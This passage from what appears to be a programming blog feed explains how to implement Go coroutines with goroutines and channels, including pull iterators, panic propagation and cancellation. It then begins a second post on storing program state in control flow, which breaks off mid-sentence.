<p> Now we can tell when a goroutine is done (<a href="https://go.dev/play/p/Y2tcF-MHeYS">full code</a>): <pre>func main() { resume := coro.New(func(_ int, yield func(string) int) string { yield("hello") yield("world") return "done" }) for i := 0; i &lt; 4; i++ { s, ok := resume(0) fmt.Printf("%q %v\n", s, ok) } } $ go run cohello.go "hello" true "world" true "done" false "" false $ </pre> <a class=anchor href="#iterator"><h2 id="iterator">Example: Iterator Conversion</h2></a> <p> The prime sieve example showed direct use of <code>coro.New</code>, but the <code>more bool</code> argument was a bit awkward and does not match the iterator functions we saw before. Let’s look at converting any push iterator into a pull iterator using <code>coro.New</code>. We will need a way to terminate the coroutine running the push iterator if we want to stop early, so we will add a boolean result from <code>yield</code> indicating whether to continue, just like in the prime sieve: <pre>push func(yield func(V) bool) </pre> <p> The goal of the new function <code>coro.Pull</code> is to turn that push function into a pull iterator. The iterator will return the next value and a boolean indicating whether that value is valid (false once the iteration is over), just like a channel receive or map lookup: <pre>pull func() (V, bool) </pre> <p> If we want to stop the push iteration early, we need some way to signal that, so <code>Pull</code> will return not just the pull function but also a stop function: <pre>stop func() </pre> <p> Putting those together, the full signature of <code>Pull</code> is: <pre>func Pull[V any](push func(yield func(V) bool)) (pull func() (V, bool), stop func()) { ... } </pre> <p> The first thing <code>Pull</code> needs to do is start a coroutine to run the push iterator, and to do that it needs a wrapper function with the right type, namely one that takes a <code>more bool</code> to match the bool result from <code>yield</code>, and that returns a final <code>V</code>. The <code>pull</code> function can call <code>resume(true)</code>, while the <code>stop</code> function can call <code>resume(false)</code>: <pre>func Pull[V any](push func(yield func(V) bool)) (pull func() (V, bool), stop func()) { copush := func(more bool, yield func(V) bool) V { if more { push(yield) } var zero V return zero } resume := coro.New(copush) pull = func() (V, bool) { return resume(true) } stop = func() { resume(false) } return pull, stop } </pre> <p> That’s the complete implementation. With the power of <code>coro.New</code>, it took very little code and effort to build a nice iterator converter.
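<p> Before wiring <code>Pull</code> into the tree comparison, here is a small usage sketch, with a made-up <code>letters</code> push iterator, showing the pull and stop functions on their own: <pre>func main() {
	// letters is a push iterator over a few fixed strings.
	letters := func(yield func(string) bool) {
		for _, s := range []string{"a", "b", "c"} {
			if !yield(s) {
				return
			}
		}
	}
	next, stop := coro.Pull(letters)
	defer stop() // safe even after the iteration has finished
	for {
		v, ok := next()
		if !ok {
			break
		}
		fmt.Println(v) // a, b, c
	}
}
</pre> <p> Each call to <code>next</code> resumes the push iterator until its next <code>yield</code>; once the iterator returns, <code>next</code> reports a zero value and false.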
<p> <p> To use <code>coro.Pull</code>, we need to redefine the tree’s <code>All</code> method to expect and use the new <code>bool</code> result from <code>yield</code>: <pre>func (t *Tree[V]) All(yield func(v V) bool) { t.all(yield) } func (t *Tree[V]) all(yield func(v V) bool) bool { return t == nil || t.Left.all(yield) &amp;&amp; yield(t.Value) &amp;&amp; t.Right.all(yield) } </pre> <p> Now we have everything we need to write a tree comparison function in Go (<a href="https://go.dev/play/p/hniFxnbXTgH">full code</a>): <pre>func cmp[V comparable](t1, t2 *Tree[V]) bool { next1, stop1 := coro.Pull(t1.All) next2, stop2 := coro.Pull(t2.All) defer stop1() defer stop2() for { v1, ok1 := next1() v2, ok2 := next2() if v1 != v2 || ok1 != ok2 { return false } if !ok1 &amp;&amp; !ok2 { return true } } } </pre> <p> <a class=anchor href="#panic"><h2 id="panic">Propagating Panics</h2></a> <p> Another improvement is to pass panics from a coroutine back to its caller, meaning the coroutine that most recently called <code>resume</code> to run it (and is therefore sitting blocked in <code>resume</code> waiting for it). Some mechanism to inform one goroutine when another panics is a very common request, but in general that can be difficult, because we don’t know which goroutine to inform and whether it is ready to hear that message. In the case of coroutines, we have the caller blocked waiting for news, so it makes sense to deliver news of the panic. <p> To do that, we can add a <code>defer</code> to catch a panic in the new coroutine and trigger it again in the <code>resume</code> that is waiting. <pre>type msg[T any] struct { panic any val T } <span style="color: #aaa"></span> <span style="color: #aaa">func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) (Out, bool)) {</span> <span style="color: #aaa"> cin := make(chan In)</span> cout := make(chan msg[Out]) <span style="color: #aaa"> running := true</span> <span style="color: #aaa"> resume = func(in In) (out Out, ok bool) {</span> <span style="color: #aaa"> if !running {</span> <span style="color: #aaa"> return</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> cin &lt;- in</span> m := &lt;-cout if m.panic != nil { panic(m.panic) } return m.val, running <span style="color: #aaa"> }</span> <span style="color: #aaa"> yield := func(out Out) In {</span> cout &lt;- msg[Out]{val: out} <span style="color: #aaa"> return &lt;-cin</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> go func() {</span> defer func() { if running { running = false cout &lt;- msg[Out]{panic: recover()} } }() <span style="color: #aaa"> out := f(&lt;-cin, yield)</span> <span style="color: #aaa"> running = false</span> cout &lt;- msg[Out]{val: out} <span style="color: #aaa"> }()</span> <span style="color: #aaa"> return resume</span> <span style="color: #aaa">}</span> </pre> <p> <p> Let’s test it out (<a href="https://go.dev/play/p/Sihm8KVlTIB">full code</a>): <pre>func main() { defer func() { if e := recover(); e != nil { fmt.Println("main panic:", e) panic(e) } }() next, _ := coro.Pull(func(yield func(string) bool) { yield("hello") panic("world") }) for { fmt.Println(next()) } } </pre> <p> The new coroutine yields <code>hello</code> and then panics <code>world</code>. That panic is propagated back to the main goroutine, which prints the value and repanics. 
We can see that the panic appears to originate in the call to <code>resume</code>: <pre>% go run coro.go hello true main panic: world panic: world [recovered] panic: world goroutine 1 [running]: main.main.func1() /tmp/coro.go:9 +0x95 panic({0x108f360?, 0x10c2cf0?}) /go/src/runtime/panic.go:1003 +0x225 main.coro_New[...].func1() /tmp/coro.go.go:55 +0x91 main.Pull[...].func2() /tmp/coro.go.go:31 +0x1c main.main() /tmp/coro.go.go:17 +0x52 exit status 2 % </pre> <a class=anchor href="#cancel"><h2 id="cancel">Cancellation</h2></a> <p> Panic propagation takes care of telling the caller about an early coroutine exit, but what about telling a coroutine about an early caller exit? Analogous to the <code>stop</code> function in the pull iterator, we need some way to signal to the coroutine that it’s no longer needed, perhaps because the caller is panicking, or perhaps because the caller is simply returning. <p> To do that, we can change <code>coro.New</code> to return not just <code>resume</code> but also a <code>cancel</code> func. Calling <code>cancel</code> will be like <code>resume</code>, except that <code>yield</code> panics instead of returning a value. If a coroutine panics in a different way during cancellation, we want <code>cancel</code> to propagate that panic, just as <code>resume</code> does. But of course we don’t want <code>cancel</code> to propagate its own panic, so we create a unique panic value we can check for. We also have to handle a cancellation that happens before <code>f</code> begins. <pre>var ErrCanceled = errors.New(&#34;coroutine canceled&#34;) <span style="color: #aaa"></span> func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) (Out, bool), cancel func()) { cin := make(chan msg[In]) <span style="color: #aaa"> cout := make(chan msg[Out])</span> <span style="color: #aaa"> running := true</span> <span style="color: #aaa"> resume = func(in In) (out Out, ok bool) {</span> <span style="color: #aaa"> if !running {</span> <span style="color: #aaa"> return</span> <span style="color: #aaa"> }</span> cin &lt;- msg[In]{val: in} <span style="color: #aaa"> m := &lt;-cout</span> <span style="color: #aaa"> if m.panic != nil {</span> <span style="color: #aaa"> panic(m.panic)</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> return m.val, running</span> <span style="color: #aaa"> }</span> cancel = func() { e := fmt.Errorf(&#34;%w&#34;, ErrCanceled) // unique wrapper cin &lt;- msg[In]{panic: e} m := &lt;-cout if m.panic != nil &amp;&amp; m.panic != e { panic(m.panic) } } yield := func(out Out) In { cout &lt;- msg[Out]{val: out} m := &lt;-cin if m.panic != nil { panic(m.panic) } return m.val <span style="color: #aaa"> }</span> <span style="color: #aaa"> go func() {</span> <span style="color: #aaa"> defer func() {</span> <span style="color: #aaa"> if running {</span> <span style="color: #aaa"> running = false</span> <span style="color: #aaa"> cout &lt;- msg[Out]{panic: recover()}</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> }()</span> var out Out m := &lt;-cin if m.panic == nil { out = f(m.val, yield) } running = false cout &lt;- msg[Out]{val: out} }() return resume, cancel <span style="color: #aaa">}</span> </pre> <p> We could change <code>Pull</code> to use panics to cancel iterators as well, but in that context the explicit <code>bool</code> seems clearer, especially since stopping an iterator is unexceptional.
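<p> Here is a minimal sketch of my own, using only the <code>resume</code>, <code>cancel</code>, and <code>yield</code> operations defined above, of what cancellation looks like from both sides: the blocked <code>yield</code> panics with an error wrapping <code>ErrCanceled</code>, the coroutine’s own deferred cleanup runs as that panic unwinds, and <code>cancel</code> absorbs the panic it caused and returns normally: <pre>func main() {
	resume, cancel := coro.New(func(_ int, yield func(string) int) string {
		defer fmt.Println("cleanup runs") // defers run as the cancellation panic unwinds
		yield("ready")
		yield("more") // cancel makes this call panic with an error wrapping ErrCanceled
		return "done"
	})
	s, ok := resume(0)
	fmt.Println(s, ok) // ready true
	cancel()           // shuts the coroutine down; its deferred cleanup runs before cancel returns
}
</pre>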
<a class=anchor href="#sieve2"><h2 id="sieve2">Example: Prime Sieve Revisited</h2></a> <p> Let’s look at how panic propagation and cancellation make cleanup of the prime sieve “just work”. First let’s update the sieve to use the new API. The <code>counter</code> and <code>filter</code> functions are already “one-line” <code>return coro.New(...)</code> calls. They change signature to include the additional cancel func returned from <code>coro.New</code>: <pre>func counter() (func(bool) (int, bool), func()) { return coro.New(...) } func filter(p int, next func(bool) (int, bool)) (func(bool) (int, bool), func()) { return coro.New(...) } </pre> <p> Then let’s convert the <code>main</code> function to be a <code>primes</code> function that prints <code>n</code> primes (<a href="https://go.dev/play/p/XWV8ACRKjDS">full code</a>): <pre>func primes(n int) { next, cancel := counter() defer cancel() for i := 0; i &lt; n; i++ { p, _ := next(true) fmt.Println(p) next, cancel = filter(p, next) defer cancel() } } </pre> <p> When this function runs, after it has gotten <code>n</code> primes, it returns. Each of the deferred <code>cancel</code> calls cleans up the coroutines that were created. And what if one of the coroutines has a bug and panics? If the coroutine was resumed by a <code>next</code> call in <code>primes</code>, then the panic comes back to <code>primes</code>, and <code>primes</code>’s deferred <code>cancel</code> calls clean up all the other coroutines. If the coroutine was resumed by a <code>next</code> call in a <code>filter</code> coroutine, then the panic will propagate up to the waiting <code>filter</code> coroutine and then the next waiting <code>filter</code> coroutine, and so on, until it gets to the <code>p</code> <code>:=</code> <code>next(true)</code> in <code>primes</code>, which will again clean up the remaining coroutines. <a class=anchor href="#api"><h2 id="api">API</h2></a> <p> The API we’ve arrived at is:<blockquote> <p> New creates a new, paused coroutine ready to run the function f. The new coroutine is a goroutine that never runs on its own: it only runs while some other goroutine invokes and waits for it, by calling resume or cancel. <p> A goroutine can pause itself and switch to the new coroutine by calling resume(in). The first call to resume starts f(in, yield). Resume blocks while f runs, until either f calls yield(out) or returns out. When f calls yield, yield blocks and resume returns out, true. When f returns, resume returns out, false. When resume has returned due to a yield, the next resume(in) switches back to f, with yield returning in. <p> Cancel stops the execution of f and shuts down the coroutine. If resume has not been called, then f does not run at all. Otherwise, cancel causes the blocked yield call to panic with an error satisfying errors.Is(err, ErrCanceled). <p> If f panics and does not recover the panic, the panic is stopped in f’s coroutine and restarted in the goroutine waiting for f, by causing the blocked resume or cancel that is waiting to re-panic with the same panic value. Cancel does not re-panic when f’s panic is one that cancel itself triggered. <p> Once f has returned or panicked, the coroutine no longer exists. Subsequent calls to resume return zero, false. Subsequent calls to cancel simply return. 
<p> The functions resume, cancel, and yield can be passed between and used by different goroutines, in effect dynamically changing which goroutine is “the coroutine.” Although New creates a new goroutine, it also establishes an invariant that one goroutine is always blocked, either in resume, cancel, yield, or (right after New) waiting for the resume that will call f. This invariant holds until f returns, at which point the new goroutine is shut down. The net result is that coro.New creates new concurrency in the program without any new parallelism. <p> If multiple goroutines call resume or cancel, those calls are serialized. Similarly, if multiple goroutines call yield, those calls are serialized.</blockquote> <pre>func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) (Out, bool), cancel func()) </pre> <a class=anchor href="#efficiency"><h2 id="efficiency">Efficiency</h2></a> <p> As I said at the start, while it’s important to have a definition of coroutines that can be understood by reference to a pure Go implementation, I believe we should use an optimized runtime implementation. On my 2019 MacBook Pro, passing values back and forth using the channel-based <code>coro.New</code> in this post requires approximately 190ns per switch, or 380ns per value in <code>coro.Pull</code>. Remember that <code>coro.Pull</code> would not be the standard way to use an iterator: the standard way would be to invoke the iterator directly, which has no coroutine overhead at all. You only need <code>coro.Pull</code> when you want to process iterated values incrementally, not using a single for loop. Even so, we want to make <code>coro.Pull</code> as fast as we can. <p> First I tried having the compiler mark send-receive pairs and leave hints for the runtime to fuse them into a single operation. That would let the channel runtime bypass the scheduler and jump directly to the other coroutine. This implementation requires about 118ns per switch, or 236ns per pulled value (38% faster). That’s better, but it’s still not as fast as I would like. The full generality of channels is adding too much overhead. <p> Next I added a direct coroutine switch to the runtime, avoiding channels entirely. That cuts the coroutine switch to three atomic compare-and-swaps (one in the coroutine data structure, one for the scheduler status of the blocking coroutine, and one for the scheduler status of the resuming coroutine), which I believe is optimal given the safety invariants that must be maintained. That implementation takes 20ns per switch, or 40ns per pulled value. This is about 10X faster than the original channel implementation. Perhaps more importantly, 40ns per pulled value seems small enough in absolute terms not to be a bottleneck for code that needs <code>coro.Pull</code>. Storing Data in Control Flow tag:research.swtch.com,2012:research.swtch.com/pcdata 2023-07-11T14:00:00-04:00 2023-07-11T14:02:00-04:00 Write programs, not simulations of programs. <p> A decision that arises over and over when designing concurrent programs is whether to represent program state in control flow or as data. This post is about what that decision means and how to approach it. Done well, taking program state stored in data and storing it instead in control flow can make programs much clearer and more maintainable than they otherwise would be. 
<p> Before saying much more, it’s important to note that <a href="https://www.youtube.com/watch?v=oV9rvDllKEg">concurrency is not parallelism</a>: <ul> <li> <p> Concurrency is about <i>how you write programs</i>, about being able to compose independently executing control flows, whether you call them processes or threads or goroutines, so that your program can be <i>dealing with</i> lots of things at once without turning into a giant mess. <li> <p> On the other hand, parallelism is about <i>how you execute programs</i>, allowing multiple computations to run simultaneously, so that your program can be <i>doing</i> lots of things at once efficiently.</ul> <p> Concurrency lends itself naturally to parallel execution, but the focus in this post is on how to use concurrency to write cleaner programs, not faster ones. <p> The difference between concurrent programs and non-concurrent programs is that concurrent programs can be written as if they are executing multiple independent control flows at the same time. The name for the smaller control flows varies by language: thread, task, process, fiber, coroutine, goroutine, and so on. No matter the name, the fundamental point for this post is that writing a program in terms of multiple independently executing control flows allows you to store program state in the execution state of one or more of those control flows, specifically in the program counter (which line is executing in that piece) and on the stack. Control flow state can always be maintained as explicit data instead, but then the explicit data form is essentially simulating the control flow. Most of the time, using the control flow features built into a programming language is easier to understand, reason about, and maintain than simulating them in data structures. <p> The rest of this post illustrates the rather abstract claims I’ve been making about storing data in control flow by walking through some concrete examples. They happen to be written in <a href="https://go.dev/">Go</a>, but the ideas apply to any language that supports writing concurrent programs, including essentially every modern language. <a class=anchor href="#step"><h2 id="step">A Step-by-Step Example</h2></a> <p> Here is a seemingly trivial problem that demonstrates what it means to store program state in control flow. Suppose we are reading characters from a file and want to scan over a C-style double-quoted string. In this case, we have a non-parallel program. There is no opportunity for parallelism here, but as we will see, concurrency can still play a useful part. <p> If we don’t worry about checking the exact escape sequences in the string, it suffices to match the regular expression <code>"([^"\\]|\\.)*"</code>, which matches a double quote, then a sequence of zero or more characters, and then another double quote. Between the quotes, a character is anything that’s not a quote or backslash, or else a backslash followed by anything (including a quote or backslash). <p> Every regular expression can be compiled into a finite automaton or state machine, so we might use a tool to turn that specification into this Go code: <pre>state := 0 for { c := read() switch state { case 0: if c != '"' { return false } state = 1 case 1: if c == '"' { return true } if c == '\\' { state = 2 } else { state = 1 } case 2: state = 1 } } </pre> <p> The code has a single variable named <code>state</code> that represents the state of the automaton.
The for loop reads a character and updates the state, over and over, until it finds either the end of the string or a syntax error. This is the kind of code that a program would write and that only a program could love. It’s difficult for people to read, and it will be difficult for people to maintain. <p> The main reason this program is so opaque is that its program state is stored as data, specifically in the variable named <code>state</code>. When it’s possible to store state in code instead, that often leads to a clearer program. To see this, let’s transform the program, one small step at a time, into an equivalent but much more understandable version. <p> <p> We can start by duplicating the <code>read</code> calls into each case of the switch: <pre><span style="color: #aaa">state := 0 state := 0</span> <span style="color: #aaa">for { for {</span> c := read() <span style="color: #aaa"> switch state { switch state {</span> <span style="color: #aaa"> case 0: case 0:</span> c := read() <span style="color: #aaa"> if c != &#39;&#34;&#39; { if c != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false return false</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> state = 1 state = 1</span> <span style="color: #aaa"> case 1: case 1:</span> c := read() <span style="color: #aaa"> if c == &#39;&#34;&#39; { if c == &#39;&#34;&#39; {</span> <span style="color: #aaa"> return true return true</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> <span style="color: #aaa"> state = 2 state = 2</span> <span style="color: #aaa"> } else { } else {</span> <span style="color: #aaa"> state = 1 state = 1</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> case 2: case 2:</span> c := read() <span style="color: #aaa"> state = 1 state = 1</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa">} }</span> </pre> <p> (In this and all the displays that follow, the old program is on the left, the new program is on the right, and lines that haven’t changed are printed in gray text.) <p> <p> Now, instead of writing to <code>state</code> and then immediately going around the for loop again to look up what to do in that state, we can use code labels and goto statements: <pre>state := 0 state0: for { switch state { case 0: <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c != &#39;&#34;&#39; { if c != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false return false</span> <span style="color: #aaa"> } }</span> state = 1 goto state1 case 1: state1: <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c == &#39;&#34;&#39; { if c == &#39;&#34;&#39; {</span> <span style="color: #aaa"> return true return true</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> state = 2 goto state2 <span style="color: #aaa"> } else { } else {</span> state = 1 goto state1 <span style="color: #aaa"> } }</span> case 2: state2: c := read() read() state = 1 goto state1 } } </pre> <p> Then we can simplify the program further. The <code>goto</code> <code>state1</code> right before the <code>state1</code> label is a no-op and can be deleted. 
And we can see that there’s only one way to get to state2, so we might as well replace the <code>goto</code> <code>state2</code> with the actual code from state2: <pre><span style="color: #aaa">state0: state0:</span> <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c != &#39;&#34;&#39; { if c != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false return false</span> <span style="color: #aaa"> } }</span> goto state1 <span style="color: #aaa">state1: state1:</span> <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c == &#39;&#34;&#39; { if c == &#39;&#34;&#39; {</span> <span style="color: #aaa"> return true return true</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> goto state2 } else { goto state1 } state2: <span style="color: #aaa"> read() read()</span> <span style="color: #aaa"> goto state1 goto state1</span> } else { goto state1 } </pre> <p> Then we can factor the “goto state1” out of both branches of the if statement. <pre><span style="color: #aaa">state0: state0:</span> <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c != &#39;&#34;&#39; { if c != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false return false</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> </span> <span style="color: #aaa">state1: state1:</span> <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c == &#39;&#34;&#39; { if c == &#39;&#34;&#39; {</span> <span style="color: #aaa"> return true return true</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> <span style="color: #aaa"> read() read()</span> goto state1 } } else { goto state1 goto state1 } </pre> <p> Then we can drop the unused <code>state0</code> label and replace the <code>state1</code> loop with an actual loop. Now we have something that looks like a real program: <pre>state0: <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c != &#39;&#34;&#39; { if c != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false return false</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> </span> state1: for { <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c == &#39;&#34;&#39; { if c == &#39;&#34;&#39; {</span> <span style="color: #aaa"> return true return true</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> <span style="color: #aaa"> read() read()</span> <span style="color: #aaa"> } }</span> goto state1 } </pre> <p> We can simplify a little further, eliminating some unnecessary variables, and we can make the check for the final quote (<code>c</code> <code>==</code> <code>""</code>) be the loop terminator. 
<pre>c := read() if read() != &#39;&#34;&#39; { if c != &#39;&#34;&#39; { <span style="color: #aaa"> return false return false</span> <span style="color: #aaa">} }</span> <span style="color: #aaa"> </span> for { var c byte c := read() for c != &#39;&#34;&#39; { if c == &#39;&#34;&#39; { c = read() return true } <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> <span style="color: #aaa"> read() read()</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa">} }</span> return true </pre> <p> The final version is: <pre>func parseQuoted(read func() byte) bool { if read() != '"' { return false } var c byte for c != '"' { c = read() if c == '\\' { read() } } return true } </pre> <p> Earlier I explained the regular expression by saying it “matches a double quote, then a sequence of zero or more characters, and then another double quote. Between the quotes, a character is anything that’s not a quote or backslash, or else a backslash followed by anything.” It’s easy to see that this program does exactly that. <p> Hand-written programs can have opportunities to use control flow too. For example, here is a version that a person might have written by hand: <pre>if read() != '"' { return false } inEscape := false for { c := read() if inEscape { inEscape = false continue } if c == '"' { return true } if c == '\\' { inEscape = true } } </pre> <p> The same kinds of small steps can be used to convert the boolean variable <code>inEscape</code> from data to control flow, ending at the same cleaned up version. <p> <p> Either way, the <code>state</code> variable in the original is now implicitly represented by the program counter, meaning which part of the program is executing. The comments in this version indicate the implicit value of the original’s <code>state</code> (or <code>inEscape</code>) variables: <pre><span style="color: #aaa">func parseQuoted(read func() byte) bool {</span> // state == 0 <span style="color: #aaa"> if read() != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"></span> <span style="color: #aaa"> var c byte</span> <span style="color: #aaa"> for c != &#39;&#34;&#39; {</span> // state == 1 (inEscape = false) <span style="color: #aaa"> c = read()</span> <span style="color: #aaa"> if c == &#39;\\&#39; {</span> // state == 2 (inEscape = true) <span style="color: #aaa"> read()</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> return true</span> <span style="color: #aaa">}</span> </pre> <p> The original program was, in essence, <i>simulating</i> this control flow using the explicit <code>state</code> variable as a program counter, tracking which line was executing. If a program can be converted to store explicit state in control flow instead, then that explicit state was merely an awkward simulation of the control flow. <a class=anchor href="#more"><h2 id="more">More Threads for More State</h2></a> <p> Before widespread support for concurrency, that kind of awkward simulation was often necessary, because a different part of the program wanted to use the control flow instead. <p> For example, suppose the text being parsed is the result of decoding base64 input, in which sequences of four 6-bit characters (drawn from a 64-character alphabet) decode to three 8-bit bytes. 
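<p> For concreteness, a <code>decode</code> helper along these lines would do that bit packing (this is just a sketch, assuming the four characters have already been translated from the base64 alphabet to their 6-bit values, and ignoring padding): <pre>// decode packs four 6-bit values into three 8-bit bytes.
// It assumes c1, c2, c3, c4 are already 6-bit values (0 to 63),
// not raw base64 characters, and it ignores '=' padding.
func decode(c1, c2, c3, c4 byte) (b1, b2, b3 byte) {
	b1 = c1&lt;&lt;2 | c2>>4
	b2 = c2&lt;&lt;4 | c3>>2
	b3 = c3&lt;&lt;6 | c4
	return b1, b2, b3
}
</pre>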
The core of that decoder looks like: <pre>for { c1, c2, c3, c4 := read(), read(), read(), read() b1, b2, b3 := decode(c1, c2, c3, c4) write(b1) write(b2) write(b3) } </pre> <p> If we want those <code>write</code> calls to feed into the parser from the previous section, we need a parser that can be called with one byte at a time, not one that demands a <code>read</code> callback. This decode loop cannot be presented as a <code>read</code> callback because it produces three bytes at a time and uses its control flow to track which ones have been written. Because the decoder is storing its own state in its control flow, <code>parseQuoted</code> cannot. <p> In a non-concurrent program, this base64 decoder and <code>parseQuoted</code> would be at an impasse: one would have to give up its use of control flow state and fall back to some kind of simulated version instead. <p> <p> To rewrite <code>parseQuoted</code>, we have to reintroduce the <code>state</code> variable, which we can encapsulate in a struct with a <code>Write</code> method: <pre>type parser struct { state int } func (p *parser) Init() { p.state = 0 } func (p *parser) Write(c byte) Status { switch p.state { case 0: if c != '"' { return BadInput } p.state = 1 case 1: if c == '"' { return Success } if c == '\\' { p.state = 2 } else { p.state = 1 } case 2: p.state = 1 } return NeedMoreInput } </pre> <p> The <code>Init</code> method initializes the state, and then each <code>Write</code> loads the state, takes actions based on the state and the input byte, and then saves the state back to the struct. <p> For <code>parseQuoted</code>, the state machine is simple enough that this may be completely fine. But maybe the state machine is much more complex, or maybe the algorithm is best expressed recursively. In those cases, being passed an input sequence by the caller one byte at a time means making all that state explicit in a data structure simulating the original control flow. <p> Concurrency eliminates the contention between different parts of the program over which gets to store state in control flow, because now there can be multiple control flows. <p> <p> Suppose we already have the <code>parseQuoted</code> function, and it’s big and complicated and tested and correct, and we don’t want to change it. We can avoid editing that code at all by writing this wrapper: <pre>type parser struct { c chan byte status chan Status } func (p *parser) Init() { p.c = make(chan byte) p.status = make(chan Status) go p.run() &lt;-p.status // always NeedMoreInput } func (p *parser) run() { if !parseQuoted(p.read) { p.status &lt;- BadSyntax } else { p.status &lt;- Success } } func (p *parser) read() byte { p.status &lt;- NeedMoreInput return &lt;-p.c } func (p *parser) Write(c byte) Status { p.c &lt;- c return &lt;-p.status } </pre> <p> Note the use of <code>parseQuoted</code>, completely unmodified, in the <code>run</code> method. Now the base64 decoder can use <code>p.Write</code> and keep its program counter and local variables. <p> The new goroutine that <code>Init</code> creates runs the <code>p.run</code> method, which invokes the original <code>parseQuoted</code> function with an appropriate implementation of <code>read</code>. Before starting <code>p.run</code>, <code>Init</code> allocates two channels for communicating between the <code>p.run</code> method, running in its own goroutine, and whatever goroutine calls <code>p.Write</code> (such as the base64 decoder’s goroutine). 
The channel <code>p.c</code> carries bytes from <code>Write</code> to <code>read</code>, and the channel <code>p.status</code> carries status updates back. Each time <code>parseQuoted</code> calls <code>read</code>, <code>p.read</code> sends <code>NeedMoreInput</code> on <code>p.status</code> and waits for an input byte on <code>p.c</code>. Each time <code>p.Write</code> is called, it does the opposite: it sends the input byte <code>c</code> on <code>p.c</code> and then waits for and returns an updated status from <code>p.status</code>. These two calls take turns, back and forth, one executing and one waiting at any given moment. <p> To get this cycle going, the <code>Init</code> method does the initial receive from <code>p.status</code>, which will correspond to the first <code>read</code> in <code>parseQuoted</code>. The actual status for that first update is guaranteed to be <code>NeedMoreInput</code> and is discarded. To end the cycle, we assume that when <code>Write</code> returns <code>BadSyntax</code> or <code>Success</code>, the caller knows not to call <code>Write</code> again. If the caller incorrectly kept calling <code>Write</code>, the send on <code>p.c</code> would block forever, since <code>parseQuoted</code> is done. We would of course make that more robust in a production implementation. <p> <p> By creating a new control flow (a new goroutine), we were able to keep the code-state-based implementation of <code>parseQuoted</code> as well as our code-state-based base64 decoder. We avoided having to understand the internals of either implementation. In this example, both are trivial enough that rewriting one would not have been a big deal, but in a larger program, it could be a huge win to be able to write this kind of adapter instead of having to make changes to existing code. As we’ll discuss <a href="#limitations">later</a>, the conversion is not entirely free – we need to make sure the extra control flow gets cleaned up, and we need to think about the cost of the context switches – but it may well still be a net win. <a class=anchor href="#stack"><h2 id="stack">Store Stacks on the Stack</h2></a> <p> The base64 decoder’s control flow state included not just the program counter but also two local variables. Those would have to be pulled out into a struct if the decoder had to be changed not to use control flow state. Programs can use an arbitrary number of local variables by using their call stack. 
For example, suppose we have a simple binary tree data structure: <pre>type Tree[V any] struct { left *Tree[V] right *Tree[V] value V } </pre> <p> If you can’t use control flow state, then to implement iteration over this tree, you have to introduce an explicit “iterator”: <pre>type Iter[V any] struct { stk []*Tree[V] } func (t *Tree[V]) NewIter() *Iter[V] { it := new(Iter[V]) for ; t != nil; t = t.left { it.stk = append(it.stk, t) } return it } func (it *Iter[V]) Next() (v V, ok bool) { if len(it.stk) == 0 { return v, false } t := it.stk[len(it.stk)-1] v = t.value it.stk = it.stk[:len(it.stk)-1] for t = t.right; t != nil; t = t.left { it.stk = append(it.stk, t) } return v, true } </pre> <p> <p> On the other hand, if you can use control flow state, confident that other parts of the program that need their own state can run in other control flows, then you can implement iteration without an explicit iterator, as a method that calls a yield function for each value: <pre>func (t *Tree[V]) All(f func(v V)) { if t != nil { t.left.All(f) f(t.value) t.right.All(f) } } </pre> <p> The <code>All</code> method is obviously correct. The correctness of the <code>Iter</code> version is much less obvious. The simplest explanation is that <code>Iter</code> is simulating <code>All</code>. The <code>NewIter</code> method’s loop that sets up <code>stk</code> is simulating the recursion in <code>t.All(f)</code> down successive <code>t.left</code> branches. <code>Next</code> pops and saves the <code>t</code> at the top of the stack and then simulates the recursion in <code>t.right.All(f)</code> down successive <code>t.left</code> branches, setting up for the next <code>Next</code>. Finally it returns the value from the top-of-stack <code>t</code>, simulating <code>f(value)</code>. <p> We could write code like <code>NewIter</code> and argue its correctness by explaining that it simulates a simple function like <code>All</code>. I’d rather write <code>All</code> and stop there. <a class=anchor href="#tree"><h2 id="tree">Comparing Binary Trees</h2></a> <p> One might argue that <code>NewIter</code> is better than <code>All</code>, because it does not use any control flow state, so it can be used in contexts that already use their control flows to hold other information. For example, what if we want to traverse two binary trees at the same time, checking that they hold the same values even if their internal structure differs? With 